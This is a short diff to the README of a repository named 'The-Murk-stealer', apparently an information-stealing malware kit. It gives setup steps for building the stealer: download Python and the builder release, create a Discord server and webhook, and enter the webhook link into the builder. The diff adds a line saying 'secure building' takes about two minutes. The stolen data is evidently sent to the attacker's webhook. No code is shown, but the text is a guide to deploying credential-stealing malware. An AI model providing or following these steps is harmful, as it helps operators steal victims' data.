Choomai/The-Murk-stealer/README.md

 ### 🔨Builder

 __So firstly you need to download [python](https://www.python.org/downloads/).
 Then you need to download the builder [here](https://github.com/Nick-Vinesmoke/The-Murk-stealer/releases/tag/The_Murk_v5.0.1).
 After that, you need to create your Discord server and webhook there.
 [How to do it](https://hookdeck.com/webhooks/platforms/how-to-get-started-with-discord-webhooks#conclusion).
-Finally, insert the name and webhook link in the builder__
+Finally, insert the name and webhook link in the builder.
+And wait, secure building will take about 2 minutes.__

 ![LOGO](Images_GitHub/builder.png)